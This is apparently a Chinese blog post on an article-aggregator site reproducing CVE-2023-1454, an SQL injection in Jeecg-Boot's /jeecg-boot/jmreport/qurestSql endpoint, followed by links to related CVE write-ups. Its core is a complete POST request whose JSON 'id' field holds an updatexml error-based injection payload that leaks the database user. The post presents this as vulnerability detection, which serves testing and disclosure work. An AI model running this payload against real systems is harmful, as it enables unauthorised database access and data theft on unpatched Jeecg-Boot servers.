CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测

7月前作者：wudidaniuniu 分类：Toy博客阅读(52) 违法举报

这篇具有很好参考价值的文章主要介绍了CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

一、漏洞信息

JeecgBoot是一款基于BPM的低代码平台！前后端分离架构 SpringBoot 2.x，SpringCloud，Ant Design&Vue，Mybatis-plus，Shiro，JWT，支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞，攻击者可以从其中获取数据库权限。

jeecg漏洞,sql,网络安全,web安全,笔记,经验分享

二、漏洞复现

访问路径：/jeecg-boot/jmreport/qurestSql

jeecg漏洞,sql,网络安全,web安全,笔记,经验分享

初步了解，存在这个路径可能会存在sql漏洞

抓包把get请求改为post请求：

发送payload

POST /jeecg-boot/jmreport/qurestSql HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Content-Type: application/json;charset=UTF-8Content-Length: 130

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

jeecg漏洞,sql,网络安全,web安全,笔记,经验分享

出现这个说明存在漏洞。

文章来源地址https://www.toymoban.com/news/detail-657431.html

到了这里，关于CVE-2023-1454 Jeecg-Boot-qurestSql-SQL-漏洞检测的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

CVE-2023-1454注入分析复现

简介 JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具，它可以通过一键生成前后端代码，无需写任何代码，让开发者更多关注业务逻辑。影响版本 Jeecg-Boot= 3.5.1 环境搭建 idea+ 后端源码： https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip 前端源码：

2024年02月16日
浏览(26)
浅析GeoServer CVE-2023-25157 SQL注入

简介 GeoServer是一个开源的地图服务器，它是遵循OpenGIS Web服务器规范的J2EE实现，通过它可以方便的将地图数据发布为地图服务，实现地理空间数据在用户之间的共享。影响版本 geoserver 2.18.7 2.19.0 =geoserver 2.19.7 2.20.0 =geoserver 2.20.7 2.21.0 =geoserver 2.21.4 2.22.0 =geoserver 2.22.2 环境搭建

2024年02月09日
浏览(25)
浅析 GeoServer CVE-2023-25157 SQL注入

原创稿件征集邮箱：edu@antvsion.com QQ：3200599554 黑客与极客相关，互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获 200-800元不等的稿酬更多详情，点我查看！简介 GeoServer是一个开源的地图服务器，它是遵循OpenGIS Web服务器规范的J2EE实现，

2024年02月10日
浏览(22)
通达OA SQL注入漏洞【CVE-2023-4166】

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。通达OA系统，即Offic Anywhere，又称为网络智

2024年02月13日
浏览(28)
MybatisPlus存在 sql 注入漏洞（CVE-2023-25330）解决办法

MyBatis-Plus TenantPlugin 是 MyBatis-Plus 的一个为多租户场景而设计的插件，可以在 SQL 中自动添加租户 ID 来实现数据隔离功能。 MyBatis-Plus TenantPlugin 3.5.3.1及之前版本由于 TenantHandler#getTenantId 方法在构造 SQL 表达式时默认情况下未对 tenant（租户）的 ID 值进行过滤，当程序启用了 Te

2024年02月07日
浏览(27)
Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

背景：公司项目扫描到 Spring-Kafka上使用通配符模式匹配进行的安全绕过漏洞 CVE-2023-20873 中等风险 | 2023年8月23日 | CVE-2023-34040 在Spring for Apache Kafka 3.0.9及更早版本以及2.9.10及更早版本中，存在可能的反序列化攻击向量，但只有在应用了不常见的配置时才会出现。攻击者必须在

2024年02月07日
浏览(39)
【高危】Spring Boot在Cloud Foundry中部署存在路由限制绕过风险（CVE-2023-20873）

Spring Boot是用于构建Java应用程序的框架，Cloud Foundry是用于部署和管理应用程序的云平台，/cloudfoundryapplication也会路由至Spring Boot actuator。当 Spring Boot 的受影响版本部署在 Cloud Foundry 上且具有处理 /cloudfoundryapplication/** 请求的代码时(如/** )，则可能绕过路由限制访问到actuator，

2024年02月01日
浏览(62)
MybatisPlus ＜= 3.5.3.1 TenantPlugin 组件存在 sql 注入漏洞（CVE-2023-25330）

MyBatis-Plus TenantPlugin 是 MyBatis-Plus 的一个为多租户场景而设计的插件，可以在 SQL 中自动添加租户 ID 来实现数据隔离功能。 MyBatis-Plus TenantPlugin 3.5.3.1及之前版本由于 TenantHandler#getTenantId 方法在构造 SQL 表达式时默认情况下未对 tenant（租户）的 ID 值进行过滤，当程序启用了 Te

2024年02月03日
浏览(35)
jeecg-boot批量导入问题注意事项

由于批量导入数据速度很快，因为数据库中的create time字段的时间可能一样，并且jeecg框架自带的是根据生成时间排序，因此在前端翻页查询的时候，数据每次排序可能会不一样，会出现第一页已经出现过一次的数据在第二页还会出现。在后端的查询接口中，要在拼接一个

2024年02月12日
浏览(36)
基于jeecg-boot的任务甘特图显示

更多功能看演示系统 gitee源代码地址后端代码： https://gitee.com/nbacheng/nbcio-boot 前端代码：https://gitee.com/nbacheng/nbcio-vue.git 在线演示（包括H5）： http://122.227.135.243:9888 基于项目的任务显示，最直观的就是甘特图显示，所以今天就说甘特图的显示经过选择，最终选择dhtmlx-gantt组

2024年02月16日
浏览(27)